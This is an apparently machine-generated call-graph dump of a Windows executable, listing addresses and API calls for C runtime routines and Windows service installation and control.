19935->19936 19936->19925 19937->19936 19938 7ff76e19d35c _set_fmode 6 API calls 19937->19938 19938->19934 19943 7ff76e19e6f8 19939->19943 19944 7ff76e19e73d 19939->19944 19940 7ff76e19e766 19941 7ff76e1a2448 __free_lconv_mon 6 API calls 19940->19941 19941->19943 19942 7ff76e1a2448 __free_lconv_mon 6 API calls 19942->19944 19943->19926 19944->19940 19944->19942 19948 7ff76e18ca90 19945->19948 19946 7ff76e18cb98 20051 7ff76e181580 19946->20051 19948->19946 19950 7ff76e18cb92 19948->19950 19951 7ff76e18cb50 19948->19951 19952 7ff76e18cafc 19948->19952 19954 7ff76e18cab8 ctype 19948->19954 20045 7ff76e1814e0 19950->20045 19955 7ff76e19084c std::_Facet_Register 30 API calls 19951->19955 19952->19950 20038 7ff76e19084c 19952->20038 19954->19820 19955->19954 19957 7ff76e18cb11 19957->19954 19958 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19957->19958 19958->19950 19960 7ff76e183311 19959->19960 19963 7ff76e18322f 19959->19963 19961 7ff76e18ca60 30 API calls 19960->19961 19962 7ff76e1833f4 19961->19962 20086 7ff76e181300 19962->20086 19968 7ff76e18df40 30 API calls 19963->19968 19966 7ff76e183434 19970 7ff76e18df40 30 API calls 19966->19970 19967 7ff76e1835b1 CreateServiceW 19972 7ff76e18371c 19967->19972 19973 7ff76e183618 19967->19973 19969 7ff76e1832a8 __vcrt_getptd_noinit 19968->19969 19971 7ff76e181250 46 API calls 19969->19971 19974 7ff76e183548 __vcrt_getptd_noinit 19970->19974 19975 7ff76e1832ce 19971->19975 19972->19972 20090 7ff76e18df40 19972->20090 19973->19973 19978 7ff76e18df40 30 API calls 19973->19978 19979 7ff76e181250 46 API calls 19974->19979 19976 7ff76e18330c 19975->19976 19983 7ff76e18386d 19975->19983 19980 7ff76e190580 _log10_special 4 API calls 19976->19980 19982 7ff76e1836a9 __vcrt_getptd_noinit 19978->19982 19992 7ff76e18356e 19979->19992 19984 7ff76e18384b 19980->19984 19981 7ff76e183798 20104 7ff76e181250 19981->20104 19989 7ff76e181250 46 API calls 19982->19989 19987 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API 
calls 19983->19987 19984->19844 19986 7ff76e1837b2 19988 7ff76e1837ed CloseServiceHandle CloseServiceHandle 19986->19988 19993 7ff76e18387f 19986->19993 19990 7ff76e183873 19987->19990 19988->19992 19991 7ff76e1836cf CloseServiceHandle 19989->19991 19994 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19990->19994 19991->19992 19992->19976 19992->19990 19995 7ff76e183868 19992->19995 19996 7ff76e183879 19992->19996 19997 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19993->19997 19994->19996 19998 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19995->19998 20000 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19996->20000 19999 7ff76e183885 RegisterServiceCtrlHandlerW 19997->19999 19998->19983 20001 7ff76e183b38 SetServiceStatus CreateEventW 19999->20001 20002 7ff76e1838d3 19999->20002 20000->19993 20003 7ff76e183ba8 SetServiceStatus CreateThread 20001->20003 20004 7ff76e183c01 __vcrt_getptd_noinit 20001->20004 20005 7ff76e18ca60 30 API calls 20002->20005 20003->20004 20012 7ff76e183b2e 20003->20012 20006 7ff76e183c07 SetServiceStatus 20004->20006 20008 7ff76e183adc 20005->20008 20006->20012 20007 7ff76e190580 _log10_special 4 API calls 20009 7ff76e183c50 20007->20009 20010 7ff76e183d40 33 API calls 20008->20010 20009->19844 20011 7ff76e183aef 20010->20011 20011->20012 20013 7ff76e183c59 20011->20013 20012->20007 20014 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20013->20014 20015 7ff76e183c5e 20014->20015 20016 7ff76e183c6d SetServiceStatus SetEvent 20015->20016 20017 7ff76e183d36 20015->20017 20018 7ff76e183cdb SetServiceStatus 20016->20018 20017->19844 20018->20017 20021 7ff76e18e4ef 20020->20021 20022 7ff76e181580 30 API calls 20021->20022 20023 7ff76e18e4f4 20022->20023 20025 7ff76e18e51b 20023->20025 20422 7ff76e18eae0 20023->20422 20025->19829 20027 7ff76e183d79 __vcrt_getptd_noinit 20026->20027 20028 7ff76e183df3 20026->20028 20547 7ff76e1812b0 20027->20547 20029 7ff76e190580 
_log10_special 4 API calls 20028->20029 20030 7ff76e183e03 20029->20030 20030->19844 20034 7ff76e19c25c _invalid_parameter_noinfo_noreturn 28 API calls 20033->20034 20035 7ff76e19c3fd 20034->20035 20036 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 20035->20036 20037 7ff76e19c412 20036->20037 20041 7ff76e190857 std::_Facet_Register 20038->20041 20039 7ff76e190870 20039->19957 20040 7ff76e190881 20042 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20040->20042 20041->20039 20041->20040 20056 7ff76e1911b4 20041->20056 20044 7ff76e190887 20042->20044 20044->19957 20046 7ff76e1814ee Concurrency::cancel_current_task 20045->20046 20047 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20046->20047 20048 7ff76e1814ff 20047->20048 20065 7ff76e19224c 20048->20065 20050 7ff76e181529 20050->19946 20078 7ff76e18f688 20051->20078 20057 7ff76e1911c2 std::bad_alloc::bad_alloc 20056->20057 20060 7ff76e192494 20057->20060 20059 7ff76e1911d3 20061 7ff76e1924b3 20060->20061 20062 7ff76e1924dc RtlPcToFileHeader 20061->20062 20063 7ff76e1924fe RaiseException 20061->20063 20064 7ff76e1924f4 20062->20064 20063->20059 20064->20063 20066 7ff76e1922a2 _Yarn 20065->20066 20067 7ff76e19226d 20065->20067 20066->20050 20067->20066 20069 7ff76e1a0ea4 20067->20069 20070 7ff76e1a0eb1 20069->20070 20071 7ff76e1a0ebb 20069->20071 20070->20071 20076 7ff76e1a0ed6 20070->20076 20072 7ff76e19d35c _set_fmode 6 API calls 20071->20072 20073 7ff76e1a0ec2 20072->20073 20074 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20073->20074 20075 7ff76e1a0ece 20074->20075 20075->20066 20076->20075 20077 7ff76e19d35c _set_fmode 6 API calls 20076->20077 20077->20073 20083 7ff76e18f538 20078->20083 20081 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20082 7ff76e18f6aa 20081->20082 20084 7ff76e19224c __std_exception_copy 28 API calls 20083->20084 20085 7ff76e18f56c 20084->20085 20085->20081 20087 7ff76e181331 20086->20087 20088 7ff76e18131d OpenSCManagerW 20086->20088 
20108 7ff76e181350 20087->20108 20088->19966 20088->19967 20091 7ff76e18e034 20090->20091 20094 7ff76e18df66 20090->20094 20092 7ff76e181580 30 API calls 20091->20092 20093 7ff76e18e03a 20092->20093 20096 7ff76e18df6c ctype 20094->20096 20097 7ff76e18dff5 20094->20097 20098 7ff76e18df9c 20094->20098 20095 7ff76e19084c std::_Facet_Register 30 API calls 20099 7ff76e18dfb2 20095->20099 20096->19981 20101 7ff76e19084c std::_Facet_Register 30 API calls 20097->20101 20098->20095 20100 7ff76e18e02e 20098->20100 20099->20096 20103 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20099->20103 20102 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20100->20102 20101->20096 20102->20091 20103->20100 20105 7ff76e18127d 20104->20105 20403 7ff76e19ac28 20105->20403 20109 7ff76e181375 20108->20109 20112 7ff76e19ad4c 20109->20112 20114 7ff76e19ada6 20112->20114 20113 7ff76e19adcb 20116 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20113->20116 20114->20113 20115 7ff76e19ae07 20114->20115 20134 7ff76e199134 20115->20134 20119 7ff76e19adf5 20116->20119 20118 7ff76e19af69 20121 7ff76e19af7f 20118->20121 20123 7ff76e196190 ProcessCodePage 28 API calls 20118->20123 20119->20118 20120 7ff76e196190 ProcessCodePage 28 API calls 20119->20120 20120->20118 20124 7ff76e190580 _log10_special 4 API calls 20121->20124 20122 7ff76e19aee8 20125 7ff76e1a2448 __free_lconv_mon 6 API calls 20122->20125 20123->20121 20127 7ff76e181399 20124->20127 20125->20119 20127->20088 20128 7ff76e19af0e 20128->20122 20131 7ff76e19af18 20128->20131 20129 7ff76e19aebd 20132 7ff76e1a2448 __free_lconv_mon 6 API calls 20129->20132 20130 7ff76e19aeb4 20130->20122 20130->20129 20133 7ff76e1a2448 __free_lconv_mon 6 API calls 20131->20133 20132->20119 20133->20119 20135 7ff76e199172 20134->20135 20136 7ff76e199162 20134->20136 20137 7ff76e1991a9 20135->20137 20138 7ff76e19917b 20135->20138 20140 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20136->20140 20137->20136 20139 
7ff76e1991a1 20137->20139 20145 7ff76e199b7c 20137->20145 20178 7ff76e199594 20137->20178 20215 7ff76e198d0c 20137->20215 20141 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20138->20141 20139->20122 20139->20128 20139->20129 20139->20130 20140->20139 20141->20139 20146 7ff76e199c2f 20145->20146 20147 7ff76e199bbe 20145->20147 20150 7ff76e199c34 20146->20150 20151 7ff76e199c88 20146->20151 20148 7ff76e199bc4 20147->20148 20149 7ff76e199c59 20147->20149 20152 7ff76e199bf8 20148->20152 20153 7ff76e199bc9 20148->20153 20238 7ff76e197dc4 20149->20238 20154 7ff76e199c36 20150->20154 20155 7ff76e199c69 20150->20155 20157 7ff76e199c9f 20151->20157 20158 7ff76e199c92 20151->20158 20162 7ff76e199c97 20151->20162 20160 7ff76e199bcf 20152->20160 20152->20162 20153->20157 20153->20160 20156 7ff76e199bd8 20154->20156 20165 7ff76e199c45 20154->20165 20245 7ff76e1979b4 20155->20245 20177 7ff76e199cc8 20156->20177 20218 7ff76e19a330 20156->20218 20252 7ff76e19a884 20157->20252 20158->20149 20158->20162 20160->20156 20166 7ff76e199c0a 20160->20166 20175 7ff76e199bf3 20160->20175 20162->20177 20256 7ff76e1981d4 20162->20256 20165->20149 20168 7ff76e199c4a 20165->20168 20166->20177 20228 7ff76e19a66c 20166->20228 20168->20177 20234 7ff76e19a730 20168->20234 20170 7ff76e190580 _log10_special 4 API calls 20172 7ff76e199fc2 20170->20172 20172->20137 20176 7ff76e199eb4 20175->20176 20175->20177 20263 7ff76e19a9a0 20175->20263 20176->20177 20270 7ff76e1a5424 20176->20270 20177->20170 20179 7ff76e1995a2 20178->20179 20180 7ff76e1995b8 20178->20180 20181 7ff76e1995f8 20179->20181 20182 7ff76e199c2f 20179->20182 20183 7ff76e199bbe 20179->20183 20180->20181 20184 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20180->20184 20181->20137 20187 7ff76e199c34 20182->20187 20188 7ff76e199c88 20182->20188 20185 7ff76e199bc4 20183->20185 20186 7ff76e199c59 20183->20186 20184->20181 20189 7ff76e199bf8 20185->20189 20190 7ff76e199bc9 20185->20190 20194 7ff76e197dc4 29 API 
calls 20186->20194 20191 7ff76e199c36 20187->20191 20196 7ff76e199c69 20187->20196 20192 7ff76e199c9f 20188->20192 20193 7ff76e199c92 20188->20193 20198 7ff76e199c97 20188->20198 20195 7ff76e199bcf 20189->20195 20189->20198 20190->20192 20190->20195 20203 7ff76e199c45 20191->20203 20204 7ff76e199bd8 20191->20204 20199 7ff76e19a884 28 API calls 20192->20199 20193->20186 20193->20198 20212 7ff76e199bf3 20194->20212 20201 7ff76e199c0a 20195->20201 20195->20204 20195->20212 20200 7ff76e1979b4 29 API calls 20196->20200 20197 7ff76e19a330 29 API calls 20197->20212 20202 7ff76e1981d4 29 API calls 20198->20202 20214 7ff76e199cc8 20198->20214 20199->20212 20200->20212 20205 7ff76e19a66c 29 API calls 20201->20205 20201->20214 20202->20212 20203->20186 20206 7ff76e199c4a 20203->20206 20204->20197 20204->20214 20205->20212 20208 7ff76e19a730 28 API calls 20206->20208 20206->20214 20207 7ff76e190580 _log10_special 4 API calls 20209 7ff76e199fc2 20207->20209 20208->20212 20209->20137 20210 7ff76e19a9a0 ProcessCodePage 28 API calls 20213 7ff76e199eb4 20210->20213 20211 7ff76e1a5424 29 API calls 20211->20213 20212->20210 20212->20213 20212->20214 20213->20211 20213->20214 20214->20207 20386 7ff76e197038 20215->20386 20219 7ff76e19a356 20218->20219 20282 7ff76e196bf0 20219->20282 20224 7ff76e19a9a0 ProcessCodePage 28 API calls 20227 7ff76e19a49b 20224->20227 20225 7ff76e19a9a0 ProcessCodePage 28 API calls 20226 7ff76e19a529 20225->20226 20226->20175 20227->20225 20227->20226 20227->20227 20231 7ff76e19a6a1 20228->20231 20229 7ff76e19a6e6 20229->20175 20230 7ff76e19a6bf 20233 7ff76e1a5424 29 API calls 20230->20233 20231->20229 20231->20230 20232 7ff76e19a9a0 ProcessCodePage 28 API calls 20231->20232 20232->20230 20233->20229 20236 7ff76e19a751 20234->20236 20235 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20237 7ff76e19a782 20235->20237 20236->20235 20236->20237 20237->20175 20239 7ff76e197df7 20238->20239 20240 7ff76e197e26 20239->20240 20242 7ff76e197ee3 
20239->20242 20244 7ff76e197e63 20240->20244 20345 7ff76e196c98 20240->20345 20243 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20242->20243 20243->20244 20244->20175 20246 7ff76e1979e7 20245->20246 20247 7ff76e197a16 20246->20247 20249 7ff76e197ad3 20246->20249 20248 7ff76e196c98 7 API calls 20247->20248 20251 7ff76e197a53 20247->20251 20248->20251 20250 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20249->20250 20250->20251 20251->20175 20253 7ff76e19a8c7 20252->20253 20255 7ff76e19a8cb __crtLCMapStringW 20253->20255 20353 7ff76e19a920 20253->20353 20255->20175 20257 7ff76e198207 20256->20257 20258 7ff76e198236 20257->20258 20260 7ff76e1982f3 20257->20260 20259 7ff76e196c98 7 API calls 20258->20259 20262 7ff76e198273 20258->20262 20259->20262 20261 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20260->20261 20261->20262 20262->20175 20264 7ff76e196190 ProcessCodePage 28 API calls 20263->20264 20265 7ff76e19a9b7 20264->20265 20357 7ff76e1a43d4 20265->20357 20272 7ff76e1a5455 20270->20272 20280 7ff76e1a5463 20270->20280 20271 7ff76e1a5483 20274 7ff76e1a5494 20271->20274 20275 7ff76e1a54bb 20271->20275 20272->20271 20273 7ff76e19a9a0 ProcessCodePage 28 API calls 20272->20273 20272->20280 20273->20271 20376 7ff76e1ae894 20274->20376 20277 7ff76e1a5546 20275->20277 20278 7ff76e1a54e5 20275->20278 20275->20280 20279 7ff76e1a9680 _fread_nolock MultiByteToWideChar 20277->20279 20278->20280 20379 7ff76e1a9680 20278->20379 20279->20280 20280->20176 20283 7ff76e196c16 20282->20283 20284 7ff76e196c27 20282->20284 20290 7ff76e1a4f8c 20283->20290 20284->20283 20285 7ff76e1a4340 _fread_nolock 7 API calls 20284->20285 20286 7ff76e196c54 20285->20286 20287 7ff76e196c68 20286->20287 20288 7ff76e1a2448 __free_lconv_mon 6 API calls 20286->20288 20289 7ff76e1a2448 __free_lconv_mon 6 API calls 20287->20289 20288->20287 20289->20283 20291 7ff76e1a4fa9 20290->20291 20292 7ff76e1a4fdc 20290->20292 20293 7ff76e19c2f8 
_invalid_parameter_noinfo_noreturn 28 API calls 20291->20293 20292->20291 20294 7ff76e1a500e 20292->20294 20306 7ff76e19a479 20293->20306 20295 7ff76e1a5056 20294->20295 20300 7ff76e1a5121 20294->20300 20295->20306 20308 7ff76e1a0ea4 __std_exception_copy 28 API calls 20295->20308 20296 7ff76e1a5213 20336 7ff76e1a4478 20296->20336 20298 7ff76e1a51d9 20329 7ff76e1a4810 20298->20329 20300->20296 20300->20298 20301 7ff76e1a51a8 20300->20301 20302 7ff76e1a516b 20300->20302 20304 7ff76e1a5161 20300->20304 20322 7ff76e1a4af0 20301->20322 20312 7ff76e1a4d20 20302->20312 20304->20298 20307 7ff76e1a5166 20304->20307 20306->20224 20306->20227 20307->20301 20307->20302 20309 7ff76e1a510e 20308->20309 20309->20306 20310 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 20309->20310 20311 7ff76e1a5270 20310->20311 20313 7ff76e1aec98 28 API calls 20312->20313 20314 7ff76e1a4d6d 20313->20314 20315 7ff76e1aeb88 28 API calls 20314->20315 20316 7ff76e1a4dc8 20315->20316 20317 7ff76e1a4e1d 20316->20317 20319 7ff76e1a4de8 20316->20319 20321 7ff76e1a4dcc 20316->20321 20318 7ff76e1a490c 28 API calls 20317->20318 20318->20321 20320 7ff76e1a4bc8 28 API calls 20319->20320 20320->20321 20321->20306 20323 7ff76e1aec98 28 API calls 20322->20323 20324 7ff76e1a4b3a 20323->20324 20325 7ff76e1aeb88 28 API calls 20324->20325 20326 7ff76e1a4b8a 20325->20326 20327 7ff76e1a4b8e 20326->20327 20328 7ff76e1a4bc8 28 API calls 20326->20328 20327->20306 20328->20327 20330 7ff76e1aec98 28 API calls 20329->20330 20331 7ff76e1a485b 20330->20331 20332 7ff76e1aeb88 28 API calls 20331->20332 20333 7ff76e1a48b3 20332->20333 20334 7ff76e1a48b7 20333->20334 20335 7ff76e1a490c 28 API calls 20333->20335 20334->20306 20335->20334 20337 7ff76e1a44f0 20336->20337 20338 7ff76e1a44bd 20336->20338 20340 7ff76e1a4508 20337->20340 20342 7ff76e1a4589 20337->20342 20339 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20338->20339 20344 7ff76e1a44e9 _fread_nolock 20339->20344 20341 7ff76e1a4810 28 API 
calls 20340->20341 20341->20344 20343 7ff76e19a9a0 ProcessCodePage 28 API calls 20342->20343 20342->20344 20343->20344 20344->20306 20346 7ff76e196cbe 20345->20346 20347 7ff76e196ccf 20345->20347 20346->20244 20347->20346 20348 7ff76e1a4340 _fread_nolock 7 API calls 20347->20348 20349 7ff76e196d00 20348->20349 20350 7ff76e196d14 20349->20350 20351 7ff76e1a2448 __free_lconv_mon 6 API calls 20349->20351 20352 7ff76e1a2448 __free_lconv_mon 6 API calls 20350->20352 20351->20350 20352->20346 20354 7ff76e19a946 20353->20354 20355 7ff76e19a93e 20353->20355 20354->20255 20356 7ff76e19a9a0 ProcessCodePage 28 API calls 20355->20356 20356->20354 20358 7ff76e19a9df 20357->20358 20359 7ff76e1a43ed 20357->20359 20361 7ff76e1a4440 20358->20361 20359->20358 20365 7ff76e1acf9c 20359->20365 20362 7ff76e19a9ef 20361->20362 20363 7ff76e1a4459 20361->20363 20362->20176 20363->20362 20373 7ff76e1aa970 20363->20373 20366 7ff76e1a1df0 _Getctype 28 API calls 20365->20366 20368 7ff76e1acfab 20366->20368 20367 7ff76e1acff6 20367->20358 20368->20367 20369 7ff76e1ad00c _Getctype 6 API calls 20368->20369 20370 7ff76e1acfe4 20369->20370 20370->20367 20371 7ff76e19d230 BuildCatchObjectHelperInternal 28 API calls 20370->20371 20372 7ff76e1ad009 20371->20372 20374 7ff76e1a1df0 _Getctype 28 API calls 20373->20374 20375 7ff76e1aa979 20374->20375 20382 7ff76e1b272c 20376->20382 20380 7ff76e1a9689 MultiByteToWideChar 20379->20380 20384 7ff76e1b2790 std::_Locinfo::_Locinfo_ctor 20382->20384 20383 7ff76e190580 _log10_special IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20385 7ff76e1ae8b1 20383->20385 20384->20383 20385->20280 20387 7ff76e19707f 20386->20387 20388 7ff76e19706d 20386->20388 20391 7ff76e19708d 20387->20391 20395 7ff76e1970c9 20387->20395 20389 7ff76e19d35c _set_fmode 6 API calls 20388->20389 20390 7ff76e197072 20389->20390 20392 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20390->20392 20393 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API 
calls 20391->20393 20400 7ff76e19707d 20392->20400 20393->20400 20394 7ff76e197445 20396 7ff76e19d35c _set_fmode 6 API calls 20394->20396 20394->20400 20395->20394 20397 7ff76e19d35c _set_fmode 6 API calls 20395->20397 20398 7ff76e1976d9 20396->20398 20399 7ff76e19743a 20397->20399 20401 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20398->20401 20402 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20399->20402 20400->20137 20401->20400 20402->20394 20404 7ff76e19ac52 20403->20404 20405 7ff76e19ac8a 20404->20405 20407 7ff76e19acbd 20404->20407 20406 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20405->20406 20410 7ff76e19acb3 20406->20410 20414 7ff76e196bb0 20407->20414 20409 7ff76e19ad27 20411 7ff76e18129b 20409->20411 20413 7ff76e196190 ProcessCodePage 28 API calls 20409->20413 20410->20409 20412 7ff76e196190 ProcessCodePage 28 API calls 20410->20412 20411->19986 20412->20409 20413->20411 20421 7ff76e196494 RtlEnterCriticalSection 20414->20421 20416 7ff76e196bcd 20417 7ff76e198af4 44 API calls 20416->20417 20418 7ff76e196bd6 20417->20418 20419 7ff76e1964a0 _fread_nolock RtlLeaveCriticalSection 20418->20419 20420 7ff76e196be0 20419->20420 20420->20410 20423 7ff76e18eb30 20422->20423 20424 7ff76e18eaf7 20422->20424 20423->20025 20424->20423 20460 7ff76e181f30 20424->20460 20426 7ff76e18eb76 20427 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20426->20427 20431 7ff76e18eb87 20427->20431 20428 7ff76e18eccf 20429 7ff76e181580 30 API calls 20428->20429 20437 7ff76e18ecd5 20429->20437 20430 7ff76e18ecc9 20432 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20430->20432 20431->20428 20431->20430 20433 7ff76e18ebbf ctype 20431->20433 20434 7ff76e18ec33 20431->20434 20435 7ff76e18ec87 20431->20435 20432->20428 20433->20025 20434->20430 20439 7ff76e19084c std::_Facet_Register 30 API calls 20434->20439 20436 7ff76e19084c std::_Facet_Register 30 API calls 20435->20436 20436->20433 20471 7ff76e18f310 20437->20471 20440 
7ff76e18ec48 20439->20440 20440->20433 20442 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20440->20442 20441 7ff76e18eeb5 20441->20025 20442->20430 20443 7ff76e181f30 30 API calls 20446 7ff76e18ef35 20443->20446 20444 7ff76e18edb1 20444->20441 20444->20443 20445 7ff76e18ed4a 20445->20444 20481 7ff76e18e040 20445->20481 20448 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20446->20448 20449 7ff76e18ef46 20448->20449 20451 7ff76e18efd0 20449->20451 20485 7ff76e18e780 20449->20485 20452 7ff76e18f1c4 20451->20452 20453 7ff76e18f176 20451->20453 20456 7ff76e181f30 30 API calls 20452->20456 20454 7ff76e18f187 20453->20454 20455 7ff76e18eae0 30 API calls 20453->20455 20454->20025 20455->20454 20457 7ff76e18f208 20456->20457 20458 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20457->20458 20459 7ff76e18f219 20458->20459 20459->20025 20461 7ff76e181f60 20460->20461 20461->20461 20462 7ff76e18df40 30 API calls 20461->20462 20463 7ff76e181f74 20462->20463 20509 7ff76e181680 20463->20509 20465 7ff76e181fc2 20465->20426 20466 7ff76e181f8d 20466->20465 20467 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20466->20467 20468 7ff76e181fe4 20467->20468 20469 7ff76e19224c __std_exception_copy 28 API calls 20468->20469 20470 7ff76e18201d 20469->20470 20470->20426 20473 7ff76e18f350 20471->20473 20476 7ff76e18f32a 20471->20476 20472 7ff76e18f34a 20472->20445 20474 7ff76e18f35e 20473->20474 20475 7ff76e18e780 30 API calls 20473->20475 20474->20445 20475->20474 20476->20472 20477 7ff76e181f30 30 API calls 20476->20477 20478 7ff76e18f3b3 20477->20478 20479 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20478->20479 20480 7ff76e18f3c4 20479->20480 20482 7ff76e18e19d 20481->20482 20483 7ff76e181580 30 API calls 20482->20483 20484 7ff76e18e1a2 20483->20484 20486 7ff76e18e847 20485->20486 20487 7ff76e18e7be 20485->20487 20489 7ff76e190580 _log10_special 4 API calls 20486->20489 20543 7ff76e18e550 20487->20543 20490 7ff76e18e87c 
20489->20490 20490->20451 20491 7ff76e18e7cb 20492 7ff76e18e834 20491->20492 20494 7ff76e18e891 20491->20494 20492->20486 20493 7ff76e18eae0 30 API calls 20492->20493 20493->20486 20495 7ff76e181f30 30 API calls 20494->20495 20496 7ff76e18e8d3 20495->20496 20497 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20496->20497 20499 7ff76e18e8e4 20497->20499 20498 7ff76e18e93d 20501 7ff76e18ea16 20498->20501 20503 7ff76e18ea52 20498->20503 20499->20498 20500 7ff76e18e780 30 API calls 20499->20500 20500->20498 20502 7ff76e18ea27 20501->20502 20504 7ff76e18eae0 30 API calls 20501->20504 20502->20451 20505 7ff76e181f30 30 API calls 20503->20505 20504->20502 20506 7ff76e18ea94 20505->20506 20507 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20506->20507 20508 7ff76e18eaa5 20507->20508 20508->20451 20513 7ff76e1816cb 20509->20513 20510 7ff76e181923 20511 7ff76e181580 30 API calls 20510->20511 20512 7ff76e181929 20511->20512 20516 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20512->20516 20513->20510 20514 7ff76e181710 20513->20514 20519 7ff76e181775 20513->20519 20521 7ff76e1816eb ctype 20513->20521 20518 7ff76e19084c std::_Facet_Register 30 API calls 20514->20518 20522 7ff76e18191d 20514->20522 20515 7ff76e1817c4 20524 7ff76e18d580 30 API calls 20515->20524 20528 7ff76e18192f __std_exception_destroy 20516->20528 20518->20521 20520 7ff76e19084c std::_Facet_Register 30 API calls 20519->20520 20520->20521 20521->20515 20523 7ff76e181918 20521->20523 20534 7ff76e18d580 20521->20534 20525 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20522->20525 20526 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20523->20526 20527 7ff76e181808 20524->20527 20525->20510 20526->20522 20527->20512 20529 7ff76e19224c __std_exception_copy 28 API calls 20527->20529 20528->20466 20530 7ff76e1818a4 20529->20530 20530->20523 20531 7ff76e1818e0 20530->20531 20532 7ff76e190580 _log10_special 4 API calls 20531->20532 20533 7ff76e181906 
20532->20533 20533->20466 20535 7ff76e18d5e2 20534->20535 20538 7ff76e18d5a3 ctype 20534->20538 20539 7ff76e18e1b0 20535->20539 20538->20515 20540 7ff76e18e338 20539->20540 20541 7ff76e181580 30 API calls 20540->20541 20542 7ff76e18e33d 20541->20542 20545 7ff76e18e579 20543->20545 20544 7ff76e18e595 20544->20491 20545->20544 20546 7ff76e18e780 30 API calls 20545->20546 20546->20544 20548 7ff76e1812de 20547->20548 20549 7ff76e1812ca ReportEventW DeregisterEventSource 20547->20549 20550 7ff76e181350 30 API calls 20548->20550 20549->20028 20550->20549 20552 7ff76e1a1df0 _Getctype 28 API calls 20551->20552 20553 7ff76e1a0e81 __crtLCMapStringW 20552->20553 20554 7ff76e19d230 BuildCatchObjectHelperInternal 28 API calls 20553->20554 20555 7ff76e1a0ea1 20554->20555 23750 7ff76e18aee0 23751 7ff76e18af09 23750->23751 23753 7ff76e18af10 23750->23753 23752 7ff76e190580 _log10_special 4 API calls 23751->23752 23754 7ff76e18b078 23752->23754 23753->23751 23755 7ff76e18af96 23753->23755 23757 7ff76e18b014 23753->23757 23755->23751 23759 7ff76e196210 23755->23759 23757->23751 23758 7ff76e19b460 46 API calls 23757->23758 23758->23751 23760 7ff76e196240 23759->23760 23767 7ff76e196028 23760->23767 23763 7ff76e196190 ProcessCodePage 28 API calls 23765 7ff76e19627e 23763->23765 23764 7ff76e196293 23764->23751 23765->23764 23766 7ff76e196190 ProcessCodePage 28 API calls 23765->23766 23766->23764 23768 7ff76e196083 23767->23768 23769 7ff76e19604e 23767->23769 23785 7ff76e196494 RtlEnterCriticalSection 23768->23785 23770 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 23769->23770 23772 7ff76e196070 23770->23772 23772->23763 23772->23765 20556 7ff76e19ebed 20557 7ff76e1a0e78 __GSHandlerCheck_EH 28 API calls 20556->20557 20558 7ff76e19ebf2 20557->20558 20559 7ff76e19ec63 20558->20559 20560 7ff76e19ec19 GetModuleHandleW 20558->20560 20568 7ff76e19eaf0 20559->20568 20560->20559 20566 7ff76e19ec26 20560->20566 20562 7ff76e19ec9f 20563 7ff76e19eca6 20562->20563 20572 7ff76e19ecbc 
20562->20572 20566->20559 20579 7ff76e19ed14 GetModuleHandleExW 20566->20579 20569 7ff76e19eb0c 20568->20569 20581 7ff76e19eb28 20569->20581 20571 7ff76e19eb15 20571->20562 20596 7ff76e19ecf0 20572->20596 20574 7ff76e19ecc9 20575 7ff76e19ecde 20574->20575 20576 7ff76e19eccd GetCurrentProcess TerminateProcess 20574->20576 20577 7ff76e19ed14 GetModuleHandleExW 20575->20577 20576->20575 20578 7ff76e19ece5 ExitProcess 20577->20578 20580 7ff76e19ed48 __crtLCMapStringW __vcrt_InitializeCriticalSectionEx 20579->20580 20580->20559 20582 7ff76e19eb3e __crtLCMapStringW 20581->20582 20584 7ff76e19eba1 20581->20584 20582->20584 20585 7ff76e1a0c20 20582->20585 20584->20571 20588 7ff76e1a0904 20585->20588 20587 7ff76e1a0c5d 20587->20584 20589 7ff76e1a0920 20588->20589 20592 7ff76e1a0af0 20589->20592 20591 7ff76e1a0929 20591->20587 20593 7ff76e1a0b16 20592->20593 20594 7ff76e1a0b1e __crtLCMapStringW 20592->20594 20593->20591 20594->20593 20595 7ff76e1a2448 __free_lconv_mon 6 API calls 20594->20595 20595->20593 